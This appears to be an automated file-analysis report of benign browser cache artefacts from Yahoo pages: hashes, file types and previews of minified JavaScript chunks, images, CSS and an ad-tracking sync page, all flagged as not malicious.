                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:21D61F9622B7E12936CEA42808EE16DA9BCD5997
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E535362E9C389033FAF37A56795D0C2F8235D8E8F18D7E8A98B8F58F7F9CA1A7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E6D94542817EB87F7C46B0C1C6172EF0E5BE0BEC832BED754FADC639C305AEDF217C8A1ABEC0099DEA60ED158E279E38A164655900C2F77F7A39AAFD0B9E489D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as N,e as p,d,f as y,i as m,q as u,U as v,k as S,n as M,x as D,b as k,t as R,j as w,h as W,l as g,m as z}from"./scheduler.Dr9AAxFe.js";import{e as C}from"./each.BExQfwb4.js";import{S as H,i as j}from"./index.DCSmZEjO.js";import{N as F,t as x}from"./commonUtil.CI22_Irn.js";function E(s,t){const{width:a,height:r,xOffset:n,yOffset:l}=s,e=t.reduce((_,h)=>_+h.area,0),i=r?e/r:0,o=a?e/a:0;let c=n,f=l;return t.map(_=>{const h=_;return h.coordinates={x:c,y:f},a>=r?(h.width=i,h.height=h.area/i,f=f+h.area/i):(h.width=h.area/o,h.height=o,c=c+h.area/o),h})}function G(s,t){const{width:a,height:r,xOffset:n,yOffset:l}=s;let e;const i=t.reduce((o,c)=>o+c.area,0);if(a>=r){const o=i/r,c=a-o;e={height:r,shortestEdge:Math.min(r,c),width:c,xOffset:n+o,yOffset:l}}else{const o=i/a,c=r-o;e={height:c,shortestEdge:Math.min(c,a),width:a,xOffset:n,yOffset:l+o}}return e}function V(s,t,a){const{sortField:r=""}=s;if(!r)return[];const n=s.rows.reduce((e,i)=>{var o;return e+parseFloat(((o=i[r])==null?void 0:o.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1387
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.816509869421683
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:NyPga3vLsTCwULHIU4dlC1ahSW0EfNBYtNboS/o4cnj6dj39AjOVCc:APfKCwm4Gkv0NboS8n4j39VVCc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AEF8727BEA8367CD9FD252C025B45887
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C2AB9D909455BFF35181DFD92BCC7BABA930867F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CE5A07D36768BCB5524044A9E92A606AE6EFFE1CB0913DFA418703461DB62FE3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5F97E368E23AA5E501E57917AEA9426704AC3C4068B34D803F44944663BAB45131170FEC2872FB868A5FACEB6856CE4D9F8870053ABA7E8D08455989A731984D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@......iq....2IDATx^.[.n.A.LIl"..'.'...t.K.......ix..] .;.Y.H..(...$.......8.17...........i..v........9ss. i,.&.7.v[..i..H[.N.YO....W.w.>.s.:3....j.T{..l..V.1.g.....Z#y.....8F.2.:.9*G>.y.....DJ#.?...X..pg..L.K.9.k.M,...Wn6..^.|.Y!...Y.y....4.u.........>S.Dd.q9.L..<K...\..*.b.{v(#.{[w9f-........c];.&@.....b...-.m.G.....^....g^...%.....4....p.wk......#......4B.)..d......<...O."b&.KA.9....C....~...;|.`...o.r.9...2wta?KO..............y..(/..,..B..\..).md.;..8}(..W.?....&A...G..u~....}O9........1l8.J...._...g.....u&.2.6.|.......,.ywG;....,.B.z..~ZQ..o...5...`.\....$3."..GY..G69.d.L...t"p.......zl.`.......A..C..!.zgWi..(.s.....=..\C... ..Y..n.nm...Uj...>..7.. ..q_...[\....&LI.^...Y..9..5....W>&X..2a.:_)f.p.........&.... ....L.`.9XH.L..&.X\.A......-..[...$C....2...,..&............h..@G.`.M.......@E....;L.8......"..N~..qg.&.C..f..^r[..0..,.\..d....!... _..,.}..D....y.A.Y.`....h....%......6Ec..m?.f.}@1...}.."H7+ ..n.D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (28754)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):28755
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.4850819536640305
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:x3CFwItnVsP/mNBHm1w+b1Cv+6NX61ol8xLYSn2/Ddp+jssZuoi78FfAT:x3/ItnePweTmu32bdwjQ8w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5E803E34A9286DEAF820616EA0DA875F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E258E1D0FECF583AAF0842EC0AC41CDEBB835992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B35998041E0DBC79CE5E15F90AB506869C1E15E24126C941E0B0A3B2B993C426
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:437091CD7A513F7C6B8D16FC8C6DB96EFA3D16D0B6FB45418CA9B2E08A3B8264DC960E5102CD25DD779DECE14D48C6B3EDC049977C00A4DCA22F0F774B00AA7B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as $,p as H,k as S,n as R,i as p,y as $e,e as D,b as U,t as A,d as N,f as P,j,h as L,q as y,_ as W,l as M,a9 as O,C as Ce,m as xe,A as at,a0 as ft,N as fe,P as et,c as ct,U as K,u as ut,g as dt,a as mt,x as ce,o as _t,I as ht,aa as gt,G as bt,W as pt,V as oe}from"./scheduler.Dr9AAxFe.js";import{S as ee,i as te,g as Y,a as I,e as Q,t as C,c as G,b as J,m as B,d as q}from"./index.DCSmZEjO.js";import{g as ve,b as Ee,as as x,P as pe,Q as he,N as Ie,r as wt,n as kt,aj as De,am as ge,_ as me,aO as Ne,aP as _e,aQ as Pe,t as ne}from"./commonUtil.CI22_Irn.js";import"./PortfolioSymbolCount.svelte_svelte_type_style_lang.EL5Zj2tO.js";import{L as vt}from"./Link.Cll6KZpb.js";import{E as St,P as yt}from"./EnhancedPill.BaO1Iq-c.js";import{B as tt}from"./Button.DpT5MMuf.js";import{D as Me}from"./keyboard_arrow_down.BadFEUQj.js";import{U as Te}from"./keyboard_arrow_up.BbXWGy0y.js";import{g as Ct,a as Et}from"./spread.CgU5AtxT.js";import{D as It}from"./delete.BAHk4Xry.js";import{D as Dt}from"./D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2694
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.791344395898635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:SthDm84FRtizw7MGo4cN1YbavuVvKHFnBcZ6gmenDr2PlMNyhm2qg:YkpFGMg9YuvuVvKHFn2obenDr6KKWg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6AD5509616A5FCA9F389801052BEA3FE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5B53D204B7E6066409067FBA9FCE5202FF20E9D6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6BECC3ABEA448B67731610708852A70C3CEB99059B2DEE98DA3711DC0620218A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:18729E5D7521224C032A2A7F18C154B1D02905DDA6A06DC3A1AF5D876BC5F651B78699589772CD6158BC1BFA75AEAD83B084BCA2B06539A3E4CC9B4A6D476DED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s2.coinmarketcap.com/static/img/coins/64x64/1831.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.............PLTEGpL..U.....P..Q..?..U.....Q..P.....Q..P..Q..P..Q.....P..P..P..Q..P..Q..RU.U..Q..Q..Q..O..R..P..Q.....Q..R..R..Q..S..P..Q..R..R..T..P..P.....P..Q..P..Q..Q.....R..S..Q..U..Q..R..N..Q..P..M..Q..R..T..R..S..P..Q..P..S..Q..R..R..Q..Q..R..R..Rf.3f.f..P..Q..P..Q..R..P..R..R..Q..Q..Q..Q..Q..S..Q..P..Q.....Q.....S..T........R..W.....E..R..H..P..K..T..U..R..O.....R..I..F..S..N..T..W..W..J..Q..P..G..U..C..R.....J.....V..G..M..S.....W..X..L....T....q..V..U..R.......t..n....c..}....U..^..~..L..j.........a......r......`......Z....J...............F..........e...................\..h..`.......?...........................U.....x..=.....S..U....W.........T....I..W........|........i...s..S..........l..~.:..V.......................btRNS......................]...x.(...b..m.a.......?......k...*.)......,......w..A........A....k..^.d!......IDATX.W.XSW....K@.....p....{...{....E.....O.!.D......U.h.W.mc.......
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (448)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2067
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.200765163481271
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:NJXQRPyHQah9c9XSQPKcAgH/OIhS3Y55z9UT:LSP+rh9c95ycn/PDz9UT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4308930648EC788EBBBB62AA7B53BAD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:388C0A48B5432E695E0AECDCAD39FBAF9EFE7D17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F88567B9186398FCF2CDABF3E3CA010FCE0B23524C531A332A779E8D6E3EDA75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F424E63448FBF556A45E3E22387A326E69E7D3F0960488CBBDA724683D54CE91C920C354CA56DD493B5B0EDF7FFBB2D6257D53559EFB9CF2B0E3DCD82D3DEA2C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>. <html lang="en-us"><head>. <meta http-equiv="content-type" content="text/html; charset=UTF-8">. <meta charset="utf-8">. <title>Yahoo</title>. <meta name="viewport" content="width=device-width,initial-scale=1,minimal-ui">. <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">. <style>. html {. height: 100%;. }. body {. background: #fafafc url(https://s.yimg.com/nn/img/sad-panda-201402200631.png) 50% 50%;. background-size: cover;. height: 100%;. text-align: center;. font: 300 18px "helvetica neue", helvetica, verdana, tahoma, arial, sans-serif;. }. table {. height: 100%;. width: 100%;. table-layout: fixed;. border-collapse: collapse;. border-spacing: 0;. border: none;. }. h1 {. font-size: 42px;. font-weight: 400;. color: #400090;. }. p {. color: #1A1A1A;. }. #message-1 {. font-weight: bold;. margin: 0;. }. #message-2 {. display:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (11304)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):11306
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.4564774567346594
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:P9YmTWwIceqlxK7TWwp+eulxKNejnnAkm9qB5o3rlxTQENhA45rMjqTwducPSPNG:PSmsgK7VcKNeTj5o3TdPA48uc6VKyAcU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:07D44545F14A0320AA3B5951D5741449
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:62732B999A4A01B784C920EECF0808CC87EBA9B8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:759D5A286AD2EE3E2718B7CA7AF4837C87DBEAFEC0F006FBE6D603EE4005FA6C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7C59D60D6C81E6791B13968313D146CCDB644FDAE694C54AC3C5DD1488765675C1CA3D3301108E4DEDB5EE751DDF39EE70469BDABDB1550BDF63B3A8A1D2B54C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as Ie,A as Me,e as V,b as O,t as G,d as L,f as N,j as A,h as j,i as p,q as F,B as ce,U as ue,k as P,l as w,x as oe,y as _e,n as se,N as U,p as he,m as re}from"./scheduler.Dr9AAxFe.js";import{S as ye,i as Se,c as H,b as Q,m as B,t as d,g as W,e as X,a as E,d as R}from"./index.DCSmZEjO.js";import{e as Y,u as Ve,o as Le}from"./each.BExQfwb4.js";import{g as Ne}from"./spread.CgU5AtxT.js";import{t as q,n as Pe,g as te,G as Ce,r as Oe,H as Ae}from"./commonUtil.CI22_Irn.js";import{L as J}from"./Link.Cll6KZpb.js";import{L as Fe,P as Te}from"./Logo.BooUAtYD.js";import{S as He}from"./SocialIcon.DtZ2-jQM.js";import{C as Qe}from"./CDS.DMTRQPpt.js";function me(o,e,t){const n=o.slice();return n[14]=e[t],n[16]=t,n}function ge(o,e,t){const n=o.slice();return n[14]=e[t],n}function de(o,e,t){const n=o.slice();return n[14]=e[t],n}function pe(o,e,t){const n=o.slice();return n[21]=e[t],n}function Be(o){let e,t;return e=new Fe({props:{width:"182",height:"25.5"}}),{c(){H(e.$$.fragment)},l(n){Q(e.$$.f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4772), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.326995477538616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:iVgbSf3qpkb6DsOsOaK81sg8euSws8B1wN:iVgbrV3fE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0FD45E30DADFBC5BEB5038219CF70DA8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:AA85E3D35AE233DE93EEC24D6C15900D9B95F21A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:9AF929C6DBB40C19A1BA1F56A97FDB5E0B457DF0D591DF178D78FBF952E92055
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0302D2AA35E1195E5BF45BBC0959FEE7739E11D433051AC8312B6EB034D51D204ED447D674AD7FE50DF42E5BD3CF9BA11AE999F03455DDDE35378BE1F31BC652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/fp/css/react-wafer-shopping.ShoppingContent.atomic.ltr.0fd45e30dadfbc5beb5038219cf70da8.min.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:#atomic .Bd\(n\),.Bd\(n\){border:none}#atomic .Bdc\(--dirty-seagull\){border-color:#e0e4e9;border-color:var(--dirty-seagull)}#atomic .Bds\(s\){border-style:solid}#atomic .Bdw\(1px\){border-width:1px}#atomic .Bdrs\(50\%\){border-radius:50%}#atomic .Bdrs\(80px\){border-radius:80px}#atomic .Bdrs\(8px\){border-radius:8px}#atomic .Bg\(\$shopping-caption-cont\){background:rgba(#7e1fff,.7);background:rgba(var(--hulk-pants),.7)}#atomic .Bgc\(--midnight\){background-color:#101518;background-color:var(--midnight)}#atomic .Bgc\(--white\){background-color:#fff;background-color:var(--white)}#atomic .Bxsh\(\$panelShadow\){box-shadow:0 2px 6px 0 rgba(0,0,0,.2)}.ad-content:hover .ad-content\:h_C\(\$streamBrandHoverClass\){color:#7e1fff!important;color:var(--hulk-pants)!important}#atomic .C\(--batcave\){color:#232a31;color:var(--batcave)}#atomic .C\(--inkwell\){color:#1d2228;color:var(--inkwell)}#atomic .C\(--malibu\){color:#ff0080;color:var(--malibu)}#atomic .C\(--white\){color:#fff;color:var(--white)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2198), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2198
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.436400774063606
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:k1kStDYK/wYrDY2DYAmDYCXwIgus/DYmt:0D9YbYHYIYAYYCAlusbYmt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9C08FCC5F1E44978D03B3A036AA02BB0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F5153F0175206970DDE6FA7285D0A6EA5559AE32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D9FD48FB99BC1AF6993FA4DD3865FE3EB5E8E64194C8CEA7D04FDEE28BB1A356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8B22AA097979DADF843B21D537E3DB27045127FB632BDB9BBDBD00963B29347C9FBFFCB8BB59192673DCA15D9E573C7B1ED80E0143A7DDF9FF43BFFA69FDD349
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ssum-sec.casalemedia.com/usermatch?ix_um=1&cb=https%3A%2F%2Fjs-sec.indexww.com%2Fht%2Fhtw-pixel.gif%3F&s=201422&gdpr=0&us_privacy=1YNN&gpp=DBAA&gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html><head><title></title></head><body><img src="https://i.liadm.com/s/31327?bidder_id=14481&amp;bidder_uuid=ZwWEk9HM54wAAGq0ANAUBAAA%261449&amp;gpdr=&amp;gdpr_consent=&amp;us_privacy=1YNN&amp;gpp=DBAA&amp;gpp_sid=-1" style="display:none" width="0" height="0" alt="" border="0" /><img src="https://pr-bh.ybp.yahoo.com/sync/casale/ZwWEk9HM54wAAGq0ANAUBAAABakAAAIB?gdpr_consent=&amp;us_privacy=1YNN&amp;gdpr=&amp;gpp=DBAA&amp;gpp_sid=-1" style="display:none" width="0" height="0" alt="" border="0" /><img src="https://secure.adnxs.com/getuid?https://dsum-sec.casalemedia.com/crum?cm_dsp_id=46&amp;external_user_id=$UID&amp;us_privacy=1YNN&amp;gpp=DBAA&amp;gpp_sid=-1" style="display:none" width="0" height="0" alt="" border="0" /><img src="https://cms.quantserve.com/pixel/p-Z8PuJEk6U7Hyq.gif?idmatch=0&amp;us_privacy=1YNN&amp;gpp=DBAA&amp;gpp_sid=-1" style="display:none" width="0" height="0" alt="" border="0" /><img src="https://casale-match.dotomi.com/match/bounce/current?networkId=19998&amp;vers
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (603)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):53604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.277163567936069
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:dYnlkqFdcNQRwTysqq4d4Y1IgnxiTP8N//oLnTuE:dYnlJEQRwTysqdIgnxwTuE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:92166C0FA3F566B2BA676C4A2E2488D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FCDB4BD94F287F41F950100E0670192D111D00C2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:172082724384A06E30A97760835A1723F14AC31B6B5CECB4A5AC82B1DEAE121A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F71793105197FEB7CA5FC0058914851C7DA0288150221B9FE709069E7D142D03B964E32CFFB0681AD14604A64212890E880AED6C2A84832AD8303DDCD7C753E7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:var $jscomp=$jscomp||{};$jscomp.scope={};$jscomp.arrayIteratorImpl=function(f){var m=0;return function(){return m<f.length?{done:!1,value:f[m++]}:{done:!0}}};$jscomp.arrayIterator=function(f){return{next:$jscomp.arrayIteratorImpl(f)}};$jscomp.makeIterator=function(f){var m="undefined"!=typeof Symbol&&Symbol.iterator&&f[Symbol.iterator];return m?m.call(f):$jscomp.arrayIterator(f)};.$jscomp.getGlobal=function(f){return"undefined"!=typeof window&&window===f?f:"undefined"!=typeof global&&null!=global?global:f};$jscomp.global=$jscomp.getGlobal(this);$jscomp.ASSUME_ES5=!1;$jscomp.ASSUME_NO_NATIVE_MAP=!1;$jscomp.ASSUME_NO_NATIVE_SET=!1;$jscomp.SIMPLE_FROUND_POLYFILL=!1;$jscomp.defineProperty=$jscomp.ASSUME_ES5||"function"==typeof Object.defineProperties?Object.defineProperty:function(f,m,v){f!=Array.prototype&&f!=Object.prototype&&(f[m]=v.value)};.$jscomp.polyfill=function(f,m,v,t){if(m){v=$jscomp.global;f=f.split(".");for(t=0;t<f.length-1;t++){var h=f[t];h in v||(v[h]={});v=v[h]}f=f[f.length
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (2266)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2267
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.47793097879573
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:pwt3XW9uMnY45T2mRAfZ1nWBy+m6LlzCetHKBmc+hU1WeQvBjV2YClAQ:exm93Y45Km2fZ1nWBy+m4dKBmc++ZgIJ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A08B6EC611DF08EA57A0F1CA3A431FEF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F2922A947F1DB4553148682F41D3036C71655DC6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2AE532E6C948B41312A2A633AD24F79D6BC7214571D4454588E5062390AD5698
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5640FFD6B8D68ABE66F714A4A3AF9FE0697BEE6850D34EC424476931CD71E72DF716D7E284DFFBF37BC9759E8FAA1279B900D4AD85FE2E0F31C3C392DEB72449
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/PositionDeleteMessage.7yyehbzp.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as V,e as h,t as b,b as S,d as y,f as d,h as I,i as E,j as k,q as O,U as N,k as U,l as u,m as q,n as L}from"./scheduler.Dr9AAxFe.js";import{S as B,i as C}from"./index.DCSmZEjO.js";import{t as T,b as M}from"./commonUtil.CI22_Irn.js";function H(l){let e,i=T(l[1]===1?"DELETE_POSITION_SUBTEXT_ONE":"DELETE_POSITION_SUBTEXT_OTHER",{ns:"common",symbol:l[0],count:l[1],price:l[4]})+"",a;return{c(){e=h("p"),a=b(i),this.h()},l(n){e=y(n,"P",{class:!0});var c=d(e);a=I(c,i),c.forEach(E),this.h()},h(){O(e,"class","description yf-t1mb2n")},m(n,c){U(n,e,c),u(e,a)},p(n,c){c&19&&i!==(i=T(n[1]===1?"DELETE_POSITION_SUBTEXT_ONE":"DELETE_POSITION_SUBTEXT_OTHER",{ns:"common",symbol:n[0],count:n[1],price:n[4]})+"")&&q(a,i)},d(n){n&&E(e)}}}function X(l){let e,i,a=T("DELETE_POSITION_TITLE",{ns:"common",symbol:l[0]})+"",n,c,f,r,_=T("DELETE_POSITION_SUBTEXT2")+"",m,s=!l[2]&&H(l);return{c(){e=h("div"),i=h("h2"),n=b(a),c=S(),s&&s.c(),f=S(),r=h("p"),m=b(_),this.h()},l(t){e=y(t,"DIV",{class:!0});var o=d(e);i=
